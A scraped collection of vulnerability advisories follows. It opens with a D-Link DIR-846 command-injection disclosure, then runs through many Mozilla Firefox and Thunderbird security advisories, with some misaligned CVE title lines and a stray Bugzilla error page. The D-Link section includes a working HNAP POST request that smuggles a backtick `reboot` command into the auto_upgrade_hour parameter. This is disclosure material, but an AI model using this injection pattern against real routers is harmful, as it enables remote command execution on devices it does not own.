D-Link DIR-846 A1_FW100A43 was discovered to contain a command injection vulnerability via the auto_upgrade_hour parameter in the SetAutoUpgradeInfo function.

**D-Link dir-846 wireless router SetAutoUpgradeInfo command injection vulnerability****1\. Basic information**

*   Vulnerability Type: Command Injection
*   Vulnerability Description: In D-Link dir-846 wireless router, firmware version A1\_FW100A43, there is a command injection vulnerability. Its SetAutoUpgradeInfo component implements a security vulnerability in processing the auto\_upgrade\_hour parameter, allowing remote attackers to use the vulnerability to submit special requests, resulting in command injection, which can lead to the execution of arbitrary system commands.
*   Device model:
    *   D-Link dir-846 wireless router
    *   Firmware version: A1\_FW100A43

**2\. Vulnerability Value**

*   Maturity of Public Information: None
*   Order of Public Vulnerability Analysis Report: None
*   Stable reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
    *   V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    *   Remote Code Execution (RCE)

**3\. PoC**

    POST /HNAP1/ HTTP/1.1
    Host: 192.168.0.1
    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json
    SOAPACTION: "http://purenetworks.com/HNAP1/SetAutoUpgradeInfo"
    HNAP_AUTH: 11583A1E429EF67F912D6EE6D079E244 1666080008220
    Content-Length: 88
    Origin: http://192.168.0.1
    Connection: close
    Referer: http://192.168.0.1/Parentcontrol.html?t=1666079999406
    Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D; SESSION_ID=2:1598955110:2; uid=57XIVmwX; PrivateKey=BE92EF6F235196D24907CBEE3556D5ED; timeout=97; PHPSESSID=1265348da22b64f02a23502dddc0772e
    Cache-Control: max-age=0
    
    {"SetAutoUpgradeInfo":{"auto_upgrade_hour":"`reboot`"}}
    

**4\. Vulnerability Principle**

When the Web management component receives a POST request, its SetAutoUpgradeInfo component implements a security vulnerability in processing the auto\_upgrade\_hour parameter, and the auto\_upgrade\_hour parameter is concatenated to execute the command. Such carefully crafted parameters lead to command injection. Attackers can use this vulnerability to directly achieve the effect of remote arbitrary command execution.

See the figure below for the auto\_upgrade\_hour parameter location: 

**5\. The basis for judging as a 0-day vulnerability****1\. Not the same vulnerability as CVE-2021-46314 and CVE-2021-46315**

Search the dir-846 keyword in the NVD database and find the vulnerabilities CVE-2021-46314 and CVE-2021-46315. Refer to the github warehouse information that disclosed the vulnerability: https://github.com/doudoudedi/DIR-846\_Command\_Injection/blob/main/DIR-846\_Command\_Injection1.md, the trigger code of this vulnerability is located in SetMasterWLanSettings and SetNetworkTomographySettings, the location The location of the code triggering this vulnerability is different, so it is not the same vulnerability.

**2\. Keyword search**

Using SetAutoUpgradeInfo as a keyword to search the NVD database, there is no query result.

CVE-2022-46642: IoTvuln/D-Link dir-846 SetAutoUpgradeInfo command injection vulnerability.md at main · CyberUnicornIoT/IoTvuln

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran. This vulnerability affects Firefox < 107.

**Mozilla Foundation Security Advisory 2022-47**

Announced

November 15, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 107

This advisory was updated December 13, 2022 to add CVE-2022-46882 and CVE-2022-46883. Both fixes were included in the original release of Firefox 107, but did not appear in the advisory published at that time.

**#CVE-2022-45403: Service Workers might have learned size of cross-origin media files**

Reporter

Anne van Kesteren and Karl Tomlinson

Impact

high

**Description**

Service Workers should not be able to infer information about opaque cross-origin responses; but timing information for cross-origin media combined with Range requests might have allowed them to determine the presence or length of a media file.

**References**

*   Bug 1762078

**#CVE-2022-45404: Fullscreen notification bypass**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popup and window.print() calls, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1790815

**#CVE-2022-45405: Use-after-free in InputStream implementation**

Reporter

Atte Kettunen

Impact

high

**Description**

Freeing arbitrary nsIInputStream's on a different thread than creation could have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1791314

**#CVE-2022-45406: Use-after-free of a JavaScript Realm**

Reporter

Samuel Groß

Impact

high

**Description**

If an out-of-memory condition occurred when creating a JavaScript global, a JavaScript realm may be deleted while references to it lived on in a BaseShape. This could lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1791975

**#CVE-2022-45407: Loading fonts on workers was not thread-safe**

Reporter

Armin Ebert

Impact

high

**Description**

If an attacker loaded a font using FontFace() on a background worker, a use-after-free could have occurred, leading to a potentially exploitable crash.

**References**

*   Bug 1793314

**#CVE-2022-45408: Fullscreen notification bypass via windowName**

Reporter

Irvan Kurniawan

Impact

high

**Description**

Through a series of popups that reuse windowName, an attacker can cause a window to go fullscreen without the user seeing the notification prompt, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1793829

**#CVE-2022-45409: Use-after-free in Garbage Collection**

Reporter

Gary Kwong

Impact

high

**Description**

The garbage collector could have been aborted in several states and zones and GCRuntime::finishCollection may not have been called, leading to a use-after-free and potentially exploitable crash

**References**

*   Bug 1796901

**#CVE-2022-45410: ServiceWorker-intercepted requests bypassed SameSite cookie policy**

Reporter

Dongsung Kim

Impact

moderate

**Description**

When a ServiceWorker intercepted a request with FetchEvent, the origin of the request was lost after the ServiceWorker took ownership of it. This had the effect of negating SameSite cookie protections. This was addressed in the spec and then in browsers.

**References**

*   Bug 1658869

**#CVE-2022-45411: Cross-Site Tracing was possible via non-standard override headers**

Reporter

scarlet

Impact

moderate

**Description**

Cross-Site Tracing occurs when a server will echo a request back via the Trace method, allowing an XSS attack to access to authorization headers and cookies inaccessible to JavaScript (such as cookies protected by HTTPOnly). To mitigate this attack, browsers placed limits on fetch() and XMLHttpRequest; however some webservers have implemented non-standard headers such as X-Http-Method-Override that override the HTTP method, and made this attack possible again. Firefox has applied the same mitigations to the use of this and similar headers.

**References**

*   Bug 1790311

**#CVE-2022-45412: Symlinks may resolve to partially uninitialized buffers**

Reporter

Armin Ebert

Impact

moderate

**Description**

When resolving a symlink such as file:///proc/self/fd/1, an error message may be produced where the symlink was resolved to a string containing unitialized memory in the buffer.  
_This bug only affects Firefox on Unix-based operated systems (Android, Linux, MacOS). Windows is unaffected._

**References**

*   Bug 1791029

**#CVE-2022-45413: SameSite=Strict cookies could have been sent cross-site via intent URLs**

Reporter

Axel Chong

Impact

moderate

**Description**

Using the S.browser_fallback_url parameter parameter, an attacker could redirect a user to a URL and cause SameSite=Strict cookies to be sent.  
_This issue only affects Firefox for Android. Other operating systems are not affected._

**References**

*   Bug 1791201

**#CVE-2022-40674: Use-after-free vulnerability in expat**

Reporter

Rhodri James

Impact

moderate

**Description**

A flaw in XML parsing could have led to a use-after-free causing a potentially exploitable crash.  
_In official releases of Firefox this vulnerability is mitigated by wasm sandboxing; versions managed by Linux distributions may have other settings._

**References**

*   Bug 1791598

**#CVE-2022-45415: Downloaded file may have been saved with malicious extension**

Reporter

Jefferson Scher and Jayateertha Guruprasad

Impact

moderate

**Description**

When downloading an HTML file, if the title of the page was formatted as a filename with a malicious extension, Firefox may have saved the file with that extension, leading to possible system compromise if the downloaded file was later ran.

**References**

*   Bug 1793551

**#CVE-2022-45416: Keystroke Side-Channel Leakage**

Reporter

Erik Kraft, Martin Schwarzl, and Andrew McCreight

Impact

moderate

**Description**

Keyboard events reference strings like "KeyA" that were at fixed, known, and widely-spread addresses. Cache-based timing attacks such as Prime+Probe could have possibly figured out which keys were being pressed.

**References**

*   Bug 1793676

**#CVE-2022-45417: Service Workers in Private Browsing Mode may have been written to disk**

Reporter

Kagami

Impact

moderate

**Description**

Service Workers did not detect Private Browsing Mode correctly in all cases, which could have led to Service Workers being written to disk for websites visited in Private Browsing Mode. This would not have persisted them in a state where they would run again, but it would have leaked Private Browsing Mode details to disk.

**References**

*   Bug 1794508

**#CVE-2022-45418: Custom mouse cursor could have been drawn over browser UI**

Reporter

Hafiizh

Impact

moderate

**Description**

If a custom mouse cursor is specified in CSS, under certain circumstances the cursor could have been drawn over the browser UI, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1795815

**#CVE-2022-46882: Use-after-free in WebGL**

Reporter

Irvan Kurniawan

Impact

moderate

**Description**

A use-after-free in WebGL extensions could have led to a potentially exploitable crash.  
_Note_: This advisory was added on December 13th, 2022 after we better understood the impact of the issue. The fix was included in the original release of Firefox 107.

**References**

*   Bug 1789371

**#CVE-2022-45419: Deleting a security exception did not take effect immediately**

Reporter

Ronald Crane

Impact

low

**Description**

If the user added a security exception for an invalid TLS certificate, opened an ongoing TLS connection with a server that used that certificate, and then deleted the exception, Firefox would have kept the connection alive, making it seem like the certificate was still trusted.

**References**

*   Bug 1716082

**#CVE-2022-45420: Iframe contents could be rendered outside the iframe**

Reporter

Suhwan Song of SNU CompSec Lab

Impact

low

**Description**

Using tables inside of an iframe, an attacker could have caused iframe contents to be rendered outside the boundaries of the iframe, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1792643

**#CVE-2022-45421: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Andrew McCreight and Gabriele Svelto reported memory safety bugs present in Firefox 106 and Firefox ESR 102.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

**#CVE-2022-46883: Memory safety bugs fixed in Firefox 107**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Gabriele Svelto, Yulia Startsev, Andrew McCreight and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 106. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.  
_Note_: This advisory was added on December 13th, 2022 after discovering it was inadvertently left out of the original advisory. The fix was included in the original release of Firefox 107.

**References**

*   Memory safety bugs fixed in Firefox 107

CVE-2022-45415: Security Vulnerabilities fixed in Firefox 107

Mozilla developers and community members Lukas Bernhard, Gabriele Svelto, Randell Jesup, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 107. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 108.

**Mozilla Foundation Security Advisory 2022-51**

Announced

December 13, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 108

**#CVE-2022-46871: libusrsctp library out of date**

Reporter

Mozilla Developers

Impact

high

**Description**

An out of date library (libusrsctp) contained vulnerabilities that could potentially be exploited.

**References**

*   Bug 1795697

**#CVE-2022-46872: Arbitrary file read from a compromised content process**

Reporter

Nika Layzell

Impact

high

**Description**

An attacker who compromised a content process could have partially escaped the sandbox to read arbitrary files via clipboard-related IPC messages.  
_This bug only affects Firefox for Linux. Other operating systems are unaffected._

**References**

*   Bug 1799156

**#CVE-2022-46873: Firefox did not implement the CSP directive unsafe-hashes**

Reporter

Pete Freitag

Impact

moderate

**Description**

Because Firefox did not implement the unsafe-hashes CSP directive, an attacker who was able to inject markup into a page otherwise protected by a Content Security Policy may have been able to inject executable script. This would be severely constrained by the specified Content Security Policy of the document.

**References**

*   Bug 1644790

**#CVE-2022-46874: Drag and Dropped Filenames could have been truncated to malicious extensions**

Reporter

Matthias Zoellner

Impact

moderate

**Description**

A file with a long filename could have had its filename truncated to remove the valid extension, leaving a malicious extension in its place. This could have potentially led to user confusion and the execution of malicious code.

**References**

*   Bug 1746139

**#CVE-2022-46875: Download Protections were bypassed by .atloc and .ftploc files on Mac OS**

Reporter

Dohyun Lee

Impact

moderate

**Description**

The executable file warning was not presented when downloading .atloc and .ftploc files, which can run commands on a user's computer.  
_Note: This issue only affected Mac OS operating systems. Other operating systems are unaffected._

**References**

*   Bug 1786188

**#CVE-2022-46877: Fullscreen notification bypass**

Reporter

Hafiizh

Impact

low

**Description**

By confusing the browser, the fullscreen notification could have been delayed or suppressed, resulting in potential user confusion or spoofing attacks.

**References**

*   Bug 1795139

**#CVE-2022-46878: Memory safety bugs fixed in Firefox 108 and Firefox ESR 102.6**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers Randell Jesup, Valentin Gosu, Olli Pettay, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 107 and Firefox ESR 102.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 108 and Firefox ESR 102.6

**#CVE-2022-46879: Memory safety bugs fixed in Firefox 108**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Lukas Bernhard, Gabriele Svelto, Randell Jesup, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 107. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 108

CVE-2022-46879: Security Vulnerabilities fixed in Firefox 108

In unusual circumstances, selecting text could cause text selection caching to behave incorrectly, leading to a crash. This vulnerability affects Firefox < 99.

**Mozilla Foundation Security Advisory 2022-13**

Announced

April 5, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 99

**#CVE-2022-1097: Use-after-free in NSSToken objects**

Reporter

Randell Jesup

Impact

high

**Description**

NSSToken objects were referenced via direct points, and could have been accessed in an unsafe way on different threads, leading to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1745667

**#CVE-2022-28281: Out of bounds write due to unexpected WebAuthN Extensions**

Reporter

Axel '0vercl0k' Souchet

Impact

high

**Description**

If a compromised content process sent an unexpected number of WebAuthN Extensions in a Register command to the parent process, an out of bounds write would have occurred leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1755621

**#CVE-2022-28282: Use-after-free in DocumentL10n::TranslateDocument**

Reporter

Kirin

Impact

moderate

**Description**

By using a link with rel="localization" a use-after-free could have been triggered by destroying an object during JavaScript execution and then referencing the object through a freed pointer, leading to a potentially exploitable crash.

**References**

*   Bug 1751609

**#CVE-2022-28283: Missing security checks for fetching sourceMapURL**

Reporter

Gijs

Impact

moderate

**Description**

The sourceMapURL feature in devtools was missing security checks that would have allowed a webpage to attempt to include local files or other files that should have been inaccessible.

**References**

*   Bug 1754066

**#CVE-2022-28284: Script could be executed via svg's use element**

Reporter

Leo Balter

Impact

moderate

**Description**

SVG's <use> element could have been used to load unexpected content that could have executed script in certain circumstances. While the specification seems to allow this, other browsers do not, and web developers relied on this property for script security so gecko's implementation was aligned with theirs.

**References**

*   Bug 1754522

**#CVE-2022-28285: Incorrect AliasSet used in JIT Codegen**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

When generating the assembly code for MLoadTypedArrayElementHole, an incorrect AliasSet was used. In conjunction with another vulnerability this could have been used for an out of bounds memory read.

**References**

*   Bug 1756957

**#CVE-2022-28286: iframe contents could be rendered outside the border**

Reporter

prada960808

Impact

low

**Description**

Due to a layout change, iframe contents could have been rendered outside of its border. This could have led to user confusion or spoofing attacks.

**References**

*   Bug 1735265

**#CVE-2022-28287: Text Selection could crash Firefox**

Reporter

Aryan Sinha

Impact

low

**Description**

In unusual circumstances, selecting text could cause text selection caching to behave incorrectly, leading to a crash.

**References**

*   Bug 1741515

**#CVE-2022-24713: Denial of Service via complex regular expressions**

Reporter

Addison Crump and Jan-Erik Rediger

Impact

low

**Description**

The rust regex crate did not properly prevent crafted regular expressions from taking an arbitrary amount of time during parsing. If an attacker was able to supply input to this crate, they could have caused a denial of service in the browser.

**References**

*   Bug 1758509

**#CVE-2022-28289: Memory safety bugs fixed in Firefox 99 and Firefox ESR 91.8**

Reporter

Mozilla developers

Impact

high

**Description**

Mozilla developers and community members Nika Layzell, Andrew McCreight, Gabriele Svelto, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 98 and Firefox ESR 91.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 99 and Firefox ESR 91.8

**#CVE-2022-28288: Memory safety bugs fixed in Firefox 99**

Reporter

Mozilla developers

Impact

moderate

**Description**

Mozilla developers and community members Randell Jesup, Sebastian Hengst, and the Mozilla Fuzzing Team reported memory safety bugs present in Firefox 98. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 99

CVE-2022-28287: Security Vulnerabilities fixed in Firefox 99

After a VR Process is destroyed, a reference to it may have been retained and used, leading to a use-after-free and potentially exploitable crash. This vulnerability affects Thunderbird < 91.8 and Firefox ESR < 91.8.

**Mozilla Foundation Security Advisory 2022-15**

Announced

April 5, 2022

Impact

high

Products

Thunderbird

Fixed in

*   Thunderbird 91.8

_In general, these flaws cannot be exploited through email in the Thunderbird product because scripting is disabled when reading mail, but are potentially risks in browser or browser-like contexts._

**#CVE-2022-1097: Use-after-free in NSSToken objects**

Reporter

Randell Jesup

Impact

high

**Description**

NSSToken objects were referenced via direct points, and could have been accessed in an unsafe way on different threads, leading to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1745667

**#CVE-2022-28281: Out of bounds write due to unexpected WebAuthN Extensions**

Reporter

Axel '0vercl0k' Souchet

Impact

high

**Description**

If a compromised content process sent an unexpected number of WebAuthN Extensions in a Register command to the parent process, an out of bounds write would have occurred leading to memory corruption and a potentially exploitable crash.

**References**

*   Bug 1755621

**#CVE-2022-1197: OpenPGP revocation information was ignored**

Reporter

Thunderbird user Johannes König

Impact

moderate

**Description**

When importing a revoked key that specified key compromise as the revocation reason, Thunderbird did not update the existing copy of the key that was not yet revoked, and the existing key was kept as non-revoked. Revocation statements that used another revocation reason, or that didn't specify a revocation reason, were unaffected.

**References**

*   Bug 1754985

**#CVE-2022-1196: Use-after-free after VR Process destruction**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

moderate

**Description**

After a VR Process is destroyed, a reference to it may have been retained and used, leading to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1750679

**#CVE-2022-28282: Use-after-free in DocumentL10n::TranslateDocument**

Reporter

Kirin

Impact

moderate

**Description**

By using a link with rel="localization" a use-after-free could have been triggered by destroying an object during JavaScript execution and then referencing the object through a freed pointer, leading to a potential exploitable crash.

**References**

*   Bug 1751609

**#CVE-2022-28285: Incorrect AliasSet used in JIT Codegen**

Reporter

Lukas Bernhard

Impact

moderate

**Description**

When generating the assembly code for MLoadTypedArrayElementHole, an incorrect AliasSet was used. In conjunction with another vulnerability this could have been used for an out of bounds memory read.

**References**

*   Bug 1756957

**#CVE-2022-28286: iframe contents could be rendered outside the border**

Reporter

prada960808

Impact

low

**Description**

Due to a layout change, iframe contents could have been rendered outside of its border. This could have led to user confusion or spoofing attacks.

**References**

*   Bug 1735265

**#CVE-2022-24713: Denial of Service via complex regular expressions**

Reporter

Addison Crump and Jan-Erik Rediger

Impact

low

**Description**

The rust regex crate did not properly prevent crafted regular expressions from taking an arbitrary amount of time during parsing. If an attacker was able to supply input to this crate, they could have caused a denial of service in the browser.

**References**

*   Bug 1758509

**#CVE-2022-28289: Memory safety bugs fixed in Thunderbird 91.8**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers and community members Nika Layzell, Andrew McCreight, Gabriele Svelto, and the Mozilla Fuzzing Team reported memory safety bugs present in Thunderbird 91.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Thunderbird 91.8

CVE-2022-1196: Security Vulnerabilities fixed in Thunderbird 91.8

<code>NSSToken</code> objects were referenced via direct points, and could have been accessed in an unsafe way on different threads, leading to a use-after-free and potentially exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8.

Sorry, I can't find "_1745667?cve=title_". It does not seem like bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1097: Invalid Bug ID

It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox. This vulnerability affects Firefox ESR < 91.5, Firefox < 96, and Thunderbird < 91.5.

**Mozilla Foundation Security Advisory 2022-02**

Announced

January 11, 2022

Impact

high

Products

Firefox ESR

Fixed in

*   Firefox ESR 91.5

**#CVE-2022-22746: Calling into reportValidity could have lead to fullscreen window spoof**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A race condition could have allowed bypassing the fullscreen notification which could have lead to a fullscreen window spoof being unnoticed.  
_This bug only affects Thunderbird for Windows. Other operating systems are unaffected._

**References**

*   Bug 1735071

**#CVE-2022-22743: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When navigating from inside an iframe while requesting fullscreen access, an attacker-controlled tab could have made the browser unable to leave fullscreen mode.

**References**

*   Bug 1739220

**#CVE-2022-22742: Out-of-bounds memory access when inserting text in edit mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When inserting text while in edit mode, some characters might have lead to out-of-bounds memory access causing a potentially exploitable crash.

**References**

*   Bug 1739923

**#CVE-2022-22741: Browser window spoof using fullscreen mode**

Reporter

Irvan Kurniawan

Impact

high

**Description**

When resizing a popup while requesting fullscreen access, the popup would have become unable to leave fullscreen mode.

**References**

*   Bug 1740389

**#CVE-2022-22740: Use-after-free of ChannelEventQueue::mOwner**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

high

**Description**

Certain network request objects were freed too early when releasing a network request handle. This could have lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1742334

**#CVE-2022-22738: Heap-buffer-overflow in blendGaussianBlur**

Reporter

Atte Kettunen

Impact

high

**Description**

Applying a CSS filter effect could have accessed out of bounds memory. This could have lead to a heap-buffer-overflow causing a potentially exploitable crash.

**References**

*   Bug 1742382

**#CVE-2022-22737: Race condition when playing audio files**

Reporter

bo13oy of Cyber Kunlun Lab

Impact

high

**Description**

Constructing audio sinks could have lead to a race condition when playing audio files and closing windows. This could have lead to a use-after-free causing a potentially exploitable crash.

**References**

*   Bug 1745874

**#CVE-2021-4140: Iframe sandbox bypass with XSLT**

Reporter

Peter Van der Beken

Impact

high

**Description**

It was possible to construct specific XSLT markup that would be able to bypass an iframe sandbox.

**References**

*   Bug 1746720

**#CVE-2022-22748: Spoofed origin on external protocol launch dialog**

Reporter

Alesandro Ortiz

Impact

moderate

**Description**

Malicious websites could have confused Thunderbird into showing the wrong origin when asking to launch a program and handling an external URL protocol.

**References**

*   Bug 1705211

**#CVE-2022-22745: Leaking cross-origin URLs through securitypolicyviolation event**

Reporter

Jannis Rautenstrauch

Impact

moderate

**Description**

Securitypolicyviolation events could have leaked cross-origin information for frame-ancestors violations

**References**

*   Bug 1735856

**#CVE-2022-22744: The 'Copy as curl' feature in DevTools did not fully escape website-controlled data, potentially leading to command injection**

Reporter

Mattias Jacobsson

Impact

moderate

**Description**

The constructed curl command from the "Copy as curl" feature in DevTools was not properly escaped for PowerShell. This could have lead to command injection if pasted into a Powershell prompt.  
_This bug only affects Firefox for Windows. Other operating systems are unaffected._

**References**

*   Bug 1737252

**#CVE-2022-22747: Crash when handling empty pkcs7 sequence**

Reporter

Tavis Ormandy

Impact

low

**Description**

After accepting an untrusted certificate, handling an empty pkcs7 sequence as part of the certificate data could have lead to a crash. This crash is believed to be unexploitable.

**References**

*   Bug 1735028

**#CVE-2022-22739: Missing throttling on external protocol launch dialog**

Reporter

Alesandro Ortiz

Impact

low

**Description**

Malicious websites could have tricked users into accepting launching a program to handle an external URL protocol.

**References**

*   Bug 1744158

**#CVE-2022-22751: Memory safety bugs fixed in Firefox 96 and Firefox ESR 91.5**

Reporter

Mozilla developers and community

Impact

high

**Description**

Mozilla developers Calixte Denizet, Kershaw Chang, Christian Holler, Jason Kratzer, Gabriele Svelto, Tyson Smith, Simon Giesecke, and Steve Fink reported memory safety bugs present in Firefox 95 and Firefox ESR 91.4. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

**References**

*   Memory safety bugs fixed in Firefox 96 and Firefox ESR 91.5

CVE-2021-4140: Security Vulnerabilities fixed in Firefox ESR 91.5

An iframe that was not permitted to run scripts could do so if the user clicked on a <code>javascript:</code> link. This vulnerability affects Firefox < 102, Firefox ESR < 91.11, Thunderbird < 102, and Thunderbird < 91.11.

**Mozilla Foundation Security Advisory 2022-24**

Announced

June 28, 2022

Impact

high

Products

Firefox

Fixed in

*   Firefox 102

_Note_: While Bug 1771084 does not represent a specific vulnerability that was fixed, we recommend anyone rebasing patches to include it. 102 branch: Patch 1 and 2. 91 Branch: Patch 1 and 2 (Despite saying Parts 2 and 3, there is no Part 1)

**#CVE-2022-34479: A popup window could be resized in a way to overlay the address bar with web content**

Reporter

Irvan Kurniawan

Impact

high

**Description**

A malicious website that could create a popup could have resized the popup to overlay the address bar with its own content, resulting in potential user confusion or spoofing attacks.  
_This bug only affects Firefox for Linux. Other operating systems are unaffected._

**References**

*   Bug 1745595

**#CVE-2022-34470: Use-after-free in nsSHistory**

Reporter

Armin Ebert

Impact

high

**Description**

Session history navigations may have led to a use-after-free and potentially exploitable crash.

**References**

*   Bug 1765951

**#CVE-2022-34468: CSP sandbox header without \`allow-scripts\` can be bypassed via retargeted javascript: URI**

Reporter

Armin Ebert

Impact

high

**Description**

An iframe that was not permitted to run scripts could do so if the user clicked on a javascript: link.

**References**

*   Bug 1768537

**#CVE-2022-34482: Drag and drop of malicious image could have led to malicious executable and potential code execution**

Reporter

Attila Suszter

Impact

moderate

**Description**

An attacker who could have convinced a user to drag and drop an image to a filesystem could have manipulated the resulting filename to contain an executable extension, and by extension potentially tricked the user into executing malicious code. While very similar, this is a separate issue from CVE-2022-34483.

**References**

*   Bug 845880

**#CVE-2022-34483: Drag and drop of malicious image could have led to malicious executable and potential code execution**

Reporter

Eduardo Braun Prado

Impact

moderate

**Description**

An attacker who could have convinced a user to drag and drop an image to a filesystem could have manipulated the resulting filename to contain an executable extension, and by extension potentially tricked the user into executing malicious code. While very similar, this is a separate issue from CVE-2022-34482.

**References**

*   Bug 1335845

**#CVE-2022-34476: ASN.1 parser could have been tricked into accepting malformed ASN.1**

Reporter

Gustavo Grieco

Impact

moderate

**Description**

ASN.1 parsing of an indefinite SEQUENCE inside an indefinite GROUP could have resulted in the parser accepting malformed ASN.1.

**References**

*   Bug 1387919

**#CVE-2022-34481: Potential integer overflow in ReplaceElementsAt**

Reporter

Ronald Crane

Impact

moderate

**Description**

In the nsTArray_Impl::ReplaceElementsAt() function, an integer overflow could have occurred when the number of elements to replace was too large for the container.

**References**

*   Bug 1497246
*   Bug 1483699

**#CVE-2022-34474: Sandboxed iframes could redirect to external schemes**

Reporter

Amazon Malvertising Team

Impact

moderate

**Description**

Even when an iframe was sandboxed with allow-top-navigation-by-user-activation, if it received a redirect header to an external protocol the browser would process the redirect and prompt the user as appropriate.

**References**

*   Bug 1677138

**#CVE-2022-34469: TLS certificate errors on HSTS-protected domains could be bypassed by the user on Firefox for Android**

Reporter

Peter Gerber

Impact

moderate

**Description**

When a TLS Certificate error occurs on a domain protected by the HSTS header, the browser should not allow the user to bypass the certificate error. On Firefox for Android, the user was presented with the option to bypass the error; this could only have been done by the user explicitly.  
_This bug only affects Firefox for Android. Other operating systems are unaffected._

**References**

*   Bug 1721220

**#CVE-2022-34471: Compromised server could trick a browser into an addon downgrade**

Reporter

Rob Wu

Impact

moderate

**Description**

When downloading an update for an addon, the downloaded addon update's version was not verified to match the version selected from the manifest. If the manifest had been tampered with on the server, an attacker could trick the browser into downgrading the addon to a prior version.

**References**

*   Bug 1766047

**#CVE-2022-34472: Unavailable PAC file resulted in OCSP requests being blocked**

Reporter

Laurent Bigonville

Impact

moderate

**Description**

If there was a PAC URL set and the server that hosts the PAC was not reachable, OCSP requests would have been blocked, resulting in incorrect error pages being shown.

**References**

*   Bug 1770123

**#CVE-2022-34478: Microsoft protocols can be attacked if a user accepts a prompt**

Reporter

Gijs

Impact

moderate

**Description**

The ms-msdt, search, and search-ms protocols deliver content to Microsoft applications, bypassing the browser, when a user accepts a prompt. These applications have had known vulnerabilities, exploited in the wild (although we know of none exploited through Firefox), so in this release Firefox has blocked these protocols from prompting the user to open them.  
_This bug only affects Firefox on Windows. Other operating systems are unaffected._

**References**

*   Bug 1773717

**#CVE-2022-2200: Undesired attributes could be set as part of prototype pollution**

Reporter

Manfred Paul via Trend Micro's Zero Day Initiative

Impact

moderate

**Description**

If an object prototype was corrupted by an attacker, they would have been able to set undesired attributes on a JavaScript object, leading to privileged code execution.

**References**

*   Bug 1771381

**#CVE-2022-34480: Free of uninitialized pointer in lg\_init**

Reporter

Ronald Crane

Impact

low

**Description**

Within the lg_init() function, if several allocations succeed but then one fails, an uninitialized pointer would have been freed despite never being allocated.

**References**

*   Bug 1454072

**#CVE-2022-34477: MediaError message property leaked information on cross-origin same-site pages**

Reporter

jannis

Impact

low

**Description**

The MediaError message property should be consistent to avoid leaking information about cross-origin resources; however for a same-site cross-origin resource, the message could have leaked information enabling XS-Leaks attacks.

**References**

*   Bug 1731614

**#CVE-2022-34475: HTML Sanitizer could have been bypassed via same-origin script via use tags**

